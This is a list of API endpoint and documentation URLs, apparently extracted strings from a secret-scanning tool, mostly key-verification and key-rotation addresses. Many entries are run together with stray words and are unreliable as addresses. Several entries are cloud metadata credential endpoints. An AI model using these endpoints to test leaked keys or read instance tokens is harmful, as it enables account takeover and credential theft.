[https://cicero.azavea.com/v3.1/account/credits_remaining](https%3A%2F%2Fcicero.azavea.com%2Fv3.1%2Faccount%2Fcredits_remaining)
[https://docs.stripe.com/api/confirmation_tokens/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fconfirmation_tokens%2Fretrieve)
[https://docs.stripe.com/api/issuing/cardholders/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fcardholders%2Fretrieve)
[https://howtorotate.com/docs/tutorials/sourcegraph/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fsourcegraph%2Fhttps)
[https://manage.windowsazure.com/publishsettings/indexraw](https%3A%2F%2Fmanage.windowsazure.com%2Fpublishsettings%2Findexraw)
[https://track.customer.io/api/v1/customers/5/eventshttps](https%3A%2F%2Ftrack.customer.io%2Fapi%2Fv1%2Fcustomers%2F5%2Feventshttps)
[https://api.cloudflare.com/client/v4/user/tokens/verify](https%3A%2F%2Fapi.cloudflare.com%2Fclient%2Fv4%2Fuser%2Ftokens%2Fverify)
[https://api.elasticemail.com/v2/account/profileoverview](https%3A%2F%2Fapi.elasticemail.com%2Fv2%2Faccount%2Fprofileoverview)
[https://api.magicbell.com/notification_preferenceshttps](https%3A%2F%2Fapi.magicbell.com%2Fnotification_preferenceshttps)
[https://app.vagrantup.com/api/v2/authenticateunexpected](https%3A%2F%2Fapp.vagrantup.com%2Fapi%2Fv2%2Fauthenticateunexpected)
[https://docs.stripe.com/api/issuing/transactions/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Ftransactions%2Fupdate)
[https://docs.stripe.com/api/payment_method_domains/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayment_method_domains%2Flist)
[https://docs.stripe.com/api/tax/calculations/line_items](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax%2Fcalculations%2Fline_items)
[https://docs.stripe.com/api/terminal/configuration/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fterminal%2Fconfiguration%2Flist)
[https://example.teamwork.com/crm/api/v2/users.jsonhttps](https%3A%2F%2Fexample.teamwork.com%2Fcrm%2Fapi%2Fv2%2Fusers.jsonhttps)
[https://formio.form.io/currentapplication/vnd.github.v3](https%3A%2F%2Fformio.form.io%2Fcurrentapplication%2Fvnd.github.v3)
[https://howtorotate.com/docs/tutorials/elevenlabs/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Felevenlabs%2Fhttps)
[https://howtorotate.com/docs/tutorials/railwayapp/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Frailwayapp%2Fhttps)
[https://microsoftgraph.chinacloudapi.cn/server_duration](https%3A%2F%2Fmicrosoftgraph.chinacloudapi.cn%2Fserver_duration)
[https://platform.segmentapis.com/v1beta/workspaceshttps](https%3A%2F%2Fplatform.segmentapis.com%2Fv1beta%2Fworkspaceshttps)
[https://api.blocknative.com/gasprices/blockpriceshttps](https%3A%2F%2Fapi.blocknative.com%2Fgasprices%2Fblockpriceshttps)
[https://api.dropboxapi.com/2/users/get_current_account](https%3A%2F%2Fapi.dropboxapi.com%2F2%2Fusers%2Fget_current_account)
[https://api.postageapp.com/v.1.0/get_account_info.json](https%3A%2F%2Fapi.postageapp.com%2Fv.1.0%2Fget_account_info.json)
[https://api.stripe.com/v1/issuing/funding_instructions](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fissuing%2Ffunding_instructions)
[https://api.textanywhere.com/API/v1.0/REST/statushttps](https%3A%2F%2Fapi.textanywhere.com%2FAPI%2Fv1.0%2FREST%2Fstatushttps)
[https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png](https%3A%2F%2Fapi.tomtom.com%2Fmap%2F1%2Ftile%2Fbasic%2Fmain%2F0%2F0%2F0.png)
[https://connect.squareupsandbox.com/oauth2/revokehttps](https%3A%2F%2Fconnect.squareupsandbox.com%2Foauth2%2Frevokehttps)
[https://console.jumpcloud.com/api/v2/systemgroupshttps](https%3A%2F%2Fconsole.jumpcloud.com%2Fapi%2Fv2%2Fsystemgroupshttps)
[https://docs.stripe.com/api/issuing/cardholders/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fcardholders%2Fcreate)
[https://howtorotate.com/docs/tutorials/atlassian/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fatlassian%2Fhttps)
[https://howtorotate.com/docs/tutorials/mailchimp/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fmailchimp%2Fhttps)
[https://howtorotate.com/docs/tutorials/sumologic/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fsumologic%2Fhttps)
[https://pdflayer.com/downloads/invoice.htmlPlanetScale](https%3A%2F%2Fpdflayer.com%2Fdownloads%2Finvoice.htmlPlanetScale)
[https://storage.mtls.googleapis.com/storage/v1/storage](https%3A%2F%2Fstorage.mtls.googleapis.com%2Fstorage%2Fv1%2Fstorage)
[https://weather.ls.hereapi.com/weather/1.0/report.json](https%3A%2F%2Fweather.ls.hereapi.com%2Fweather%2F1.0%2Freport.json)
[https://www.googleapis.com/auth/devstorage.read_writeB](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.read_writeB)
[https://www.happyscribe.com/api/v1/transcriptionshttps](https%3A%2F%2Fwww.happyscribe.com%2Fapi%2Fv1%2Ftranscriptionshttps)
[https://www.mongodb.com/supportability/documentdbAzure](https%3A%2F%2Fwww.mongodb.com%2Fsupportability%2FdocumentdbAzure)
[https://www.protocols.io/api/v3/session/profilerequest](https%3A%2F%2Fwww.protocols.io%2Fapi%2Fv3%2Fsession%2Fprofilerequest)
[http://169.254.169.254/metadata/identity/oauth2/token](http%3A%2F%2F169.254.169.254%2Fmetadata%2Fidentity%2Foauth2%2Ftoken)
[https://api.centralstationcrm.net/api/users.jsonhttps](https%3A%2F%2Fapi.centralstationcrm.net%2Fapi%2Fusers.jsonhttps)
[https://api.mavenlink.com/api/v1/workspaces.jsonhttps](https%3A%2F%2Fapi.mavenlink.com%2Fapi%2Fv1%2Fworkspaces.jsonhttps)
[https://api.parsers.dev/api/v1/parse/postgresql/https](https%3A%2F%2Fapi.parsers.dev%2Fapi%2Fv1%2Fparse%2Fpostgresql%2Fhttps)
[https://api.partnerstack.com/api/v2/partnershipshttps](https%3A%2F%2Fapi.partnerstack.com%2Fapi%2Fv2%2Fpartnershipshttps)
[https://api.stripe.com/v1/customers/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fcustomers%2Fnowaythiscanexist)
[https://app.onedesk.com/rest/2.0/login/loginUserhttps](https%3A%2F%2Fapp.onedesk.com%2Frest%2F2.0%2Flogin%2FloginUserhttps)
[https://app.ticketmaster.com/discovery/v2/events.json](https%3A%2F%2Fapp.ticketmaster.com%2Fdiscovery%2Fv2%2Fevents.json)
[https://connect.squareupsandbox.com/v2/merchantshttps](https%3A%2F%2Fconnect.squareupsandbox.com%2Fv2%2Fmerchantshttps)
[https://docs.stripe.com/api/issuing/disputes/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fdisputes%2Fretrieve)
[https://docs.stripe.com/api/reporting/report_run/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Freporting%2Freport_run%2Flist)
[https://docs.stripe.com/api/terminal/locations/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fterminal%2Flocations%2Fcreate)
[https://gitlab.com/api/v4/personal_access_tokens/self](https%3A%2F%2Fgitlab.com%2Fapi%2Fv4%2Fpersonal_access_tokens%2Fself)
[https://howtorotate.com/docs/tutorials/airbrake/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fairbrake%2Fhttps)
[https://howtorotate.com/docs/tutorials/sendbird/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fsendbird%2Fhttps)
[https://howtorotate.com/docs/tutorials/sendgrid/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fsendgrid%2Fhttps)
[https://trackapi.nutritionix.com/v2/natural/nutrients](https%3A%2F%2Ftrackapi.nutritionix.com%2Fv2%2Fnatural%2Fnutrients)
[https://vault.azure.net/mysql.database.azure.comhttps](https%3A%2F%2Fvault.azure.net%2Fmysql.database.azure.comhttps)
[https://www.carboninterface.com/api/v1/estimateshttps](https%3A%2F%2Fwww.carboninterface.com%2Fapi%2Fv1%2Festimateshttps)
[https://www.googleapis.com/youtube/v3/channelSections](https%3A%2F%2Fwww.googleapis.com%2Fyoutube%2Fv3%2FchannelSections)
[https://api.api2cart.com/v1.1/account.cart.list.json](https%3A%2F%2Fapi.api2cart.com%2Fv1.1%2Faccount.cart.list.json)
[https://api.developer.coinbase.com/waas/pools/protoc](https%3A%2F%2Fapi.developer.coinbase.com%2Fwaas%2Fpools%2Fprotoc)
[https://api.glassnode.com/v1/metrics/indicators/sopr](https%3A%2F%2Fapi.glassnode.com%2Fv1%2Fmetrics%2Findicators%2Fsopr)
[https://api.instabot.io/v1spring.datasource.password](https%3A%2F%2Fapi.instabot.io%2Fv1spring.datasource.password)
[https://api.openai.com/v1/modelsuser.scheduled_sends](https%3A%2F%2Fapi.openai.com%2Fv1%2Fmodelsuser.scheduled_sends)
[https://api.stripe.com/v1/disputes/nowaycanthisexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fdisputes%2Fnowaycanthisexist)
[https://api.teletype.app/public/api/v1/messageshttps](https%3A%2F%2Fapi.teletype.app%2Fpublic%2Fapi%2Fv1%2Fmessageshttps)
[https://app.terraform.io/api/v2/account/detailshttps](https%3A%2F%2Fapp.terraform.io%2Fapi%2Fv2%2Faccount%2Fdetailshttps)
[https://connect.squareup.com/oauth2/token/statusx509](https%3A%2F%2Fconnect.squareup.com%2Foauth2%2Ftoken%2Fstatusx509)
[https://docs.stripe.com/api/checkout/sessions/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcheckout%2Fsessions%2Fcreate)
[https://docs.stripe.com/api/customer_sessions/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcustomer_sessions%2Fcreate)
[https://docs.stripe.com/api/tax/registrations/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax%2Fregistrations%2Fupdate)
[https://docs.stripe.com/api/webhook_endpoints/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fwebhook_endpoints%2Fcreate)
[https://gist.github.comMetaDataValidationErrorunable](https%3A%2F%2Fgist.github.comMetaDataValidationErrorunable)
[https://howtorotate.com/docs/tutorials/maxmind/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fmaxmind%2Fhttps)
[https://rendyplayground.simvoly.com/api/site/members](https%3A%2F%2Frendyplayground.simvoly.com%2Fapi%2Fsite%2Fmembers)
[https://www.browserstack.com/automate/plan.jsonhttps](https%3A%2F%2Fwww.browserstack.com%2Fautomate%2Fplan.jsonhttps)
[http://metadata/computeMetadata/v1/instance/service](http%3A%2F%2Fmetadata%2FcomputeMetadata%2Fv1%2Finstance%2Fservice)
[https://api.skybiometry.com/fc/account/authenticate](https%3A%2F%2Fapi.skybiometry.com%2Ffc%2Faccount%2Fauthenticate)
[https://api.stripe.com/v1/sources/nowaycanthisexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fsources%2Fnowaycanthisexist)
[https://apiv4.reallysimplesystems.com/accountshttps](https%3A%2F%2Fapiv4.reallysimplesystems.com%2Faccountshttps)
[https://docs.stripe.com/api/issuing/disputes/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fdisputes%2Fupdate)
[https://docs.stripe.com/api/issuing/tokens/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Ftokens%2Fretrieve)
[https://docs.stripe.com/api/tax/calculations/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax%2Fcalculations%2Fcreate)
[https://docs.stripe.com/api/terminal/locations/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fterminal%2Flocations%2Flist)
[https://docs.stripe.com/api/terminal/readers/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fterminal%2Freaders%2Fcreate)
[https://github.com/login/oauth/access_tokenexpected](https%3A%2F%2Fgithub.com%2Flogin%2Foauth%2Faccess_tokenexpected)
[https://howtorotate.com/docs/tutorials/eraser/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Feraser%2Fhttps)
[https://howtorotate.com/docs/tutorials/github/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fgithub%2Fhttps)
[https://howtorotate.com/docs/tutorials/gitlab/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fgitlab%2Fhttps)
[https://howtorotate.com/docs/tutorials/square/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fsquare%2Fhttps)
[https://howtorotate.com/docs/tutorials/stripe/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fstripe%2Fhttps)
[https://keychecker.trufflesecurity.com/fingerprint/](https%3A%2F%2Fkeychecker.trufflesecurity.com%2Ffingerprint%2F)
[https://nethunt.com/api/v1/zapier/triggers/readable](https%3A%2F%2Fnethunt.com%2Fapi%2Fv1%2Fzapier%2Ftriggers%2Freadable)
[https://owlbot.info/api/v4/dictionary/securityhttps](https%3A%2F%2Fowlbot.info%2Fapi%2Fv4%2Fdictionary%2Fsecurityhttps)
[https://transit.walkscore.com/transit/search/stops/](https%3A%2F%2Ftransit.walkscore.com%2Ftransit%2Fsearch%2Fstops%2F)
[https://uptime.betterstack.com/api/v2/monitorshttps](https%3A%2F%2Fuptime.betterstack.com%2Fapi%2Fv2%2Fmonitorshttps)
[https://www.googleapis.com/blogger/v3/blogs/2399953](https%3A%2F%2Fwww.googleapis.com%2Fblogger%2Fv3%2Fblogs%2F2399953)
[https://amplitude.com/api/2/taxonomy/categoryhttps](https%3A%2F%2Famplitude.com%2Fapi%2F2%2Ftaxonomy%2Fcategoryhttps)
[https://api.appfollow.io/api/v2/account/usershttps](https%3A%2F%2Fapi.appfollow.io%2Fapi%2Fv2%2Faccount%2Fusershttps)
[https://api.developer.coinbase.com/waas/poolsquery](https%3A%2F%2Fapi.developer.coinbase.com%2Fwaas%2Fpoolsquery)
[https://api.edenai.run/v1/automl/text/projecthttps](https%3A%2F%2Fapi.edenai.run%2Fv1%2Fautoml%2Ftext%2Fprojecthttps)
[https://api.loginradius.com/identity/v2/serverinfo](https%3A%2F%2Fapi.loginradius.com%2Fidentity%2Fv2%2Fserverinfo)
[https://api.shutterstock.com/v2/images/searchhttps](https%3A%2F%2Fapi.shutterstock.com%2Fv2%2Fimages%2Fsearchhttps)
[https://api.stripe.com/v1/quotes/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fquotes%2Fnowaythiscanexist)
[https://api.stripe.com/v1/test_helpers/test_clocks](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftest_helpers%2Ftest_clocks)
[https://api.stripe.com/v1/tokens/nowaycanthisexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftokens%2Fnowaycanthisexist)
[https://app.revampcrm.com/api/1.0/User/WhoAmIhttps](https%3A%2F%2Fapp.revampcrm.com%2Fapi%2F1.0%2FUser%2FWhoAmIhttps)
[https://disqus.com/api/3.0/trends/listThreads.json](https%3A%2F%2Fdisqus.com%2Fapi%2F3.0%2Ftrends%2FlistThreads.json)
[https://docs.stripe.com/api/checkout/sessions/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcheckout%2Fsessions%2Flist)
[https://docs.stripe.com/api/issuing/cards/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fcards%2Fretrieve)
[https://docs.stripe.com/api/payment_intents/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayment_intents%2Fcreate)
[https://docs.stripe.com/api/promotion_codes/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpromotion_codes%2Fcreate)
[https://docs.stripe.com/api/webhook_endpoints/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fwebhook_endpoints%2Flist)
[https://financialmodelingprep.com/api/v3/financial](https%3A%2F%2Ffinancialmodelingprep.com%2Fapi%2Fv3%2Ffinancial)
[https://gate.sendbird.com/api/v2/applicationshttps](https%3A%2F%2Fgate.sendbird.com%2Fapi%2Fv2%2Fapplicationshttps)
[https://github.com/trufflesecurity/test_keyscannot](https%3A%2F%2Fgithub.com%2Ftrufflesecurity%2Ftest_keyscannot)
[https://howtorotate.com/docs/tutorials/aws/request](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Faws%2Frequest)
[https://howtorotate.com/docs/tutorials/azure/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fazure%2Fhttps)
[https://howtorotate.com/docs/tutorials/mongo/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fmongo%2Fhttps)
[https://ws.detectlanguage.com/0.2/user/statushttps](https%3A%2F%2Fws.detectlanguage.com%2F0.2%2Fuser%2Fstatushttps)
[https://www.pivotaltracker.com/services/v5/mehttps](https%3A%2F%2Fwww.pivotaltracker.com%2Fservices%2Fv5%2Fmehttps)
[http://dictionaryperceptionrevolutionfoundationpx](http%3A%2F%2Fdictionaryperceptionrevolutionfoundationpx)
[https://api.cloudflare.com/client/v4/certificates](https%3A%2F%2Fapi.cloudflare.com%2Fclient%2Fv4%2Fcertificates)
[https://api.fulcrumapp.com/api/v2/forms.jsonhttps](https%3A%2F%2Fapi.fulcrumapp.com%2Fapi%2Fv2%2Fforms.jsonhttps)
[https://api.pandadoc.com/public/v1/documentshttps](https%3A%2F%2Fapi.pandadoc.com%2Fpublic%2Fv1%2Fdocumentshttps)
[https://api.planetscale.com/v1/organizationshttps](https%3A%2F%2Fapi.planetscale.com%2Fv1%2Forganizationshttps)
[https://api.stripe.com/v1/billing_portal/sessions](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fbilling_portal%2Fsessions)
[https://api.upcdatabase.org/product/0111222333446](https%3A%2F%2Fapi.upcdatabase.org%2Fproduct%2F0111222333446)
[https://api.weatherbit.io/v2.0/history/airquality](https%3A%2F%2Fapi.weatherbit.io%2Fv2.0%2Fhistory%2Fairquality)
[https://cloud.iexapis.com/stable/stock/aapl/quote](https%3A%2F%2Fcloud.iexapis.com%2Fstable%2Fstock%2Faapl%2Fquote)
[https://docs.stripe.com/api/application_fees/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fapplication_fees%2Flist)
[https://docs.stripe.com/api/issuing/tokens/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Ftokens%2Fupdate)
[https://docs.stripe.com/api/radar/reviews/approve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fradar%2Freviews%2Fapprove)
[https://docs.stripe.com/api/shipping_rates/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fshipping_rates%2Fcreate)
[https://docs.stripe.com/api/tax/settings/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax%2Fsettings%2Fretrieve)
[https://docs.stripe.com/api/terminal/readers/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fterminal%2Freaders%2Flist)
[https://docsapi.helpscout.net/v1/collectionshttps](https%3A%2F%2Fdocsapi.helpscout.net%2Fv1%2Fcollectionshttps)
[https://howtorotate.com/docs/tutorials/groq/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fgroq%2Fhttps)
[https://io.adafruit.com/api/v2/ladybugtest/feeds/](https%3A%2F%2Fio.adafruit.com%2Fapi%2Fv2%2Fladybugtest%2Ffeeds%2F)
[https://salescookie.com/app/Api/CreateTransaction](https%3A%2F%2Fsalescookie.com%2Fapp%2FApi%2FCreateTransaction)
[https://slack.com/api/auth.testCreateCustomerCard](https%3A%2F%2Fslack.com%2Fapi%2Fauth.testCreateCustomerCard)
[https://vault.azure.cn/vault.microsoftazure.denot](https%3A%2F%2Fvault.azure.cn%2Fvault.microsoftazure.denot)
[https://www.bugherd.com/api_v2/projects.jsonhttps](https%3A%2F%2Fwww.bugherd.com%2Fapi_v2%2Fprojects.jsonhttps)
[https://yourwebsite.com/callbacks_handler/BuddyNS](https%3A%2F%2Fyourwebsite.com%2Fcallbacks_handler%2FBuddyNS)
[https://api.appointedd.com/v1/availability/slots](https%3A%2F%2Fapi.appointedd.com%2Fv1%2Favailability%2Fslots)
[https://api.openai.com/v1/fine_tuning/jobsfailed](https%3A%2F%2Fapi.openai.com%2Fv1%2Ffine_tuning%2Fjobsfailed)
[https://api.paymongo.com/v1/payment_methodshttps](https%3A%2F%2Fapi.paymongo.com%2Fv1%2Fpayment_methodshttps)
[https://api.postbacks.io/v1/requestPostbackhttps](https%3A%2F%2Fapi.postbacks.io%2Fv1%2FrequestPostbackhttps)
[https://api.route4me.com/api.v4/address_book.php](https%3A%2F%2Fapi.route4me.com%2Fapi.v4%2Faddress_book.php)
[https://api.sandbox.checkout.com/customers/https](https%3A%2F%2Fapi.sandbox.checkout.com%2Fcustomers%2Fhttps)
[https://api.stripe.com/v1/payment_method_domains](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fpayment_method_domains)
[https://api.worksnaps.com/api/projects.xmlunable](https%3A%2F%2Fapi.worksnaps.com%2Fapi%2Fprojects.xmlunable)
[https://docs.stripe.com/api/billing/meter/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fbilling%2Fmeter%2Fcreate)
[https://docs.stripe.com/api/climate/order/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fclimate%2Forder%2Fcreate)
[https://docs.stripe.com/api/issuing/cards/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fcards%2Fcreate)
[https://docs.stripe.com/api/payment_intents/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayment_intents%2Flist)
[https://docs.stripe.com/api/promotion_codes/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpromotion_codes%2Flist)
[https://docs.stripe.com/api/setup_intents/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fsetup_intents%2Fcreate)
[https://docs.stripe.com/api/subscriptions/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fsubscriptions%2Fcreate)
[https://docs.stripe.com/api/usage_records/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fusage_records%2Fcreate)
[https://howtorotate.com/docs/tutorials/gcp/https](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fgcp%2Fhttps)
[https://oauth2.googleapis.com/tokenoauth2/google](https%3A%2F%2Foauth2.googleapis.com%2Ftokenoauth2%2Fgoogle)
[https://person.clearbit.com/v1/people/email/alex](https%3A%2F%2Fperson.clearbit.com%2Fv1%2Fpeople%2Femail%2Falex)
[https://www.ipqualityscore.com/api/json/account/](https%3A%2F%2Fwww.ipqualityscore.com%2Fapi%2Fjson%2Faccount%2F)
[https://www.mindmeister.com/services/rest/oauth2](https%3A%2F%2Fwww.mindmeister.com%2Fservices%2Frest%2Foauth2)
[https://www.worldcoinindex.com/apiservice/ticker](https%3A%2F%2Fwww.worldcoinindex.com%2Fapiservice%2Fticker)
[http://169.254.170.2RequestLimitExceededinvalid](http%3A%2F%2F169.254.170.2RequestLimitExceededinvalid)
[https://api.enablex.io/voice/v1/call/api/access](https%3A%2F%2Fapi.enablex.io%2Fvoice%2Fv1%2Fcall%2Fapi%2Faccess)
[https://api.flutterwave.com/v3/subaccountshttps](https%3A%2F%2Fapi.flutterwave.com%2Fv3%2Fsubaccountshttps)
[https://api.getpostman.com/collections/0/ch1/0/](https%3A%2F%2Fapi.getpostman.com%2Fcollections%2F0%2Fch1%2F0%2F)
[https://api.openweathermap.org/data/2.5/weather](https%3A%2F%2Fapi.openweathermap.org%2Fdata%2F2.5%2Fweather)
[https://api.peopledatalabs.com/v5/person/enrich](https%3A%2F%2Fapi.peopledatalabs.com%2Fv5%2Fperson%2Fenrich)
[https://api.pepipost.com/v5.1/domain/getDomains](https%3A%2F%2Fapi.pepipost.com%2Fv5.1%2Fdomain%2FgetDomains)
[https://api.signupgenius.com/v2/k/user/profile/](https%3A%2F%2Fapi.signupgenius.com%2Fv2%2Fk%2Fuser%2Fprofile%2F)
[https://api.stripe.com/v1/reporting/report_runs](https%3A%2F%2Fapi.stripe.com%2Fv1%2Freporting%2Freport_runs)
[https://api.surveyanyplace.com/v1/surveys/https](https%3A%2F%2Fapi.surveyanyplace.com%2Fv1%2Fsurveys%2Fhttps)
[https://api.unify.id/v1/humandetect/verifyhttps](https%3A%2F%2Fapi.unify.id%2Fv1%2Fhumandetect%2Fverifyhttps)
[https://app.onepagecrm.com/api/v3/contacts.json](https%3A%2F%2Fapp.onepagecrm.com%2Fapi%2Fv3%2Fcontacts.json)
[https://docs.stripe.com/api/credit_notes/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcredit_notes%2Fupdate)
[https://docs.stripe.com/api/shipping_rates/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fshipping_rates%2Flist)
[https://learning.postman.com/docs/collaborating](https%3A%2F%2Flearning.postman.com%2Fdocs%2Fcollaborating)
[https://management.core.usgovcloudapi.net/https](https%3A%2F%2Fmanagement.core.usgovcloudapi.net%2Fhttps)
[https://mandrillapp.com/api/1.0/users/infohttps](https%3A%2F%2Fmandrillapp.com%2Fapi%2F1.0%2Fusers%2Finfohttps)
[https://otx.alienvault.com/api/v1/users/mehttps](https%3A%2F%2Fotx.alienvault.com%2Fapi%2Fv1%2Fusers%2Fmehttps)
[https://run.salesblink.io/api/public/listshttps](https%3A%2F%2Frun.salesblink.io%2Fapi%2Fpublic%2Flistshttps)
[https://storage.UNIVERSE_DOMAIN/storage/v1/gccl](https%3A%2F%2Fstorage.UNIVERSE_DOMAIN%2Fstorage%2Fv1%2Fgccl)
[https://unify.apideck.com/vault/consumerscouldn](https%3A%2F%2Funify.apideck.com%2Fvault%2Fconsumerscouldn)
[https://www.mongodb.com/supportability/cosmosdb](https%3A%2F%2Fwww.mongodb.com%2Fsupportability%2Fcosmosdb)
[https://www.virustotal.com/api/v3/metadatahttps](https%3A%2F%2Fwww.virustotal.com%2Fapi%2Fv3%2Fmetadatahttps)
[https://accounts.google.com/o/oauth2/authhttps](https%3A%2F%2Faccounts.google.com%2Fo%2Foauth2%2Fauthhttps)
[https://api.bitbucket.org/2.0/repositoriesMake](https%3A%2F%2Fapi.bitbucket.org%2F2.0%2FrepositoriesMake)
[https://api.cloudflare.com/client/v4/userhttps](https%3A%2F%2Fapi.cloudflare.com%2Fclient%2Fv4%2Fuserhttps)
[https://api.detectify.com/rest/v2/assets/https](https%3A%2F%2Fapi.detectify.com%2Frest%2Fv2%2Fassets%2Fhttps)
[https://api.github.com/user/social_accountssql](https%3A%2F%2Fapi.github.com%2Fuser%2Fsocial_accountssql)
[https://api.helpcrunch.com/v1/departmentshttps](https%3A%2F%2Fapi.helpcrunch.com%2Fv1%2Fdepartmentshttps)
[https://api.lokalise.com/api2/system/languages](https%3A%2F%2Fapi.lokalise.com%2Fapi2%2Fsystem%2Flanguages)
[https://api.pinata.cloud/pinning/pinJSONToIPFS](https%3A%2F%2Fapi.pinata.cloud%2Fpinning%2FpinJSONToIPFS)
[https://api.postmarkapp.com/deliverystatshttps](https%3A%2F%2Fapi.postmarkapp.com%2Fdeliverystatshttps)
[https://api.sherpadesk.com/organizations/https](https%3A%2F%2Fapi.sherpadesk.com%2Forganizations%2Fhttps)
[https://api.stripe.com/v1/billing/meter_events](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fbilling%2Fmeter_events)
[https://api.surveysparrow.com/v1/contactshttps](https%3A%2F%2Fapi.surveysparrow.com%2Fv1%2Fcontactshttps)
[https://api.travelpayouts.com/v2/prices/latest](https%3A%2F%2Fapi.travelpayouts.com%2Fv2%2Fprices%2Flatest)
[https://api.tyntec.com/2fa/v1/applicationerror](https%3A%2F%2Fapi.tyntec.com%2F2fa%2Fv1%2Fapplicationerror)
[https://dev.azuresynapse.usgovcloudapi.netdata](https%3A%2F%2Fdev.azuresynapse.usgovcloudapi.netdata)
[https://docs.stripe.com/api/billing/meter/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fbilling%2Fmeter%2Flist)
[https://docs.stripe.com/api/climate/order/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fclimate%2Forder%2Flist)
[https://docs.stripe.com/api/fee_refunds/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ffee_refunds%2Fcreate)
[https://docs.stripe.com/api/radar/reviews/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fradar%2Freviews%2Flist)
[https://docs.stripe.com/api/setup_intents/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fsetup_intents%2Flist)
[https://docs.stripe.com/api/subscriptions/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fsubscriptions%2Flist)
[https://docs.stripe.com/api/test_clocks/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftest_clocks%2Fcreate)
[https://docs.stripe.com/api/tokens/create_card](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftokens%2Fcreate_card)
[https://github.com/golang/protobuf/issues/1609](https%3A%2F%2Fgithub.com%2Fgolang%2Fprotobuf%2Fissues%2F1609)
[https://howtorotate.com/docs/tutorials/twilio/](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Ftwilio%2F)
